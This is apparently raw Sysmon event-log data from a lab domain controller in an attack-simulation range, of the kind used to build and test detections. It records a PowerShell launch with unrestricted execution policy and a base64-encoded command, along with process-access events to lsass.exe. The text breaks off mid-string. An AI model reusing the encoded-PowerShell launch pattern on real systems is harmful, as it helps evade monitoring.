3{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000002836Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.928{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002835Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.928{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002834Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.896{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_rbcplzou.1f1.ps12020-11-03 15:51:58.896 10341000x80000000000000002833Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.881{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002832Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C9E-5FA1-8600-000000008801}23921200C:\Windows\system32\conhost.exe{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002831Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002830Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002829Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002828Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002827Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002826Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002825Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002824Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002823Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002822Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002821Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002820Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.865{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002819Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C9E-5FA1-8700-000000008801}44441744C:\Windows\system32\cmd.exe{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002818Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.864{D28789B6-7C9E-5FA1-8800-000000008801}1740C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFk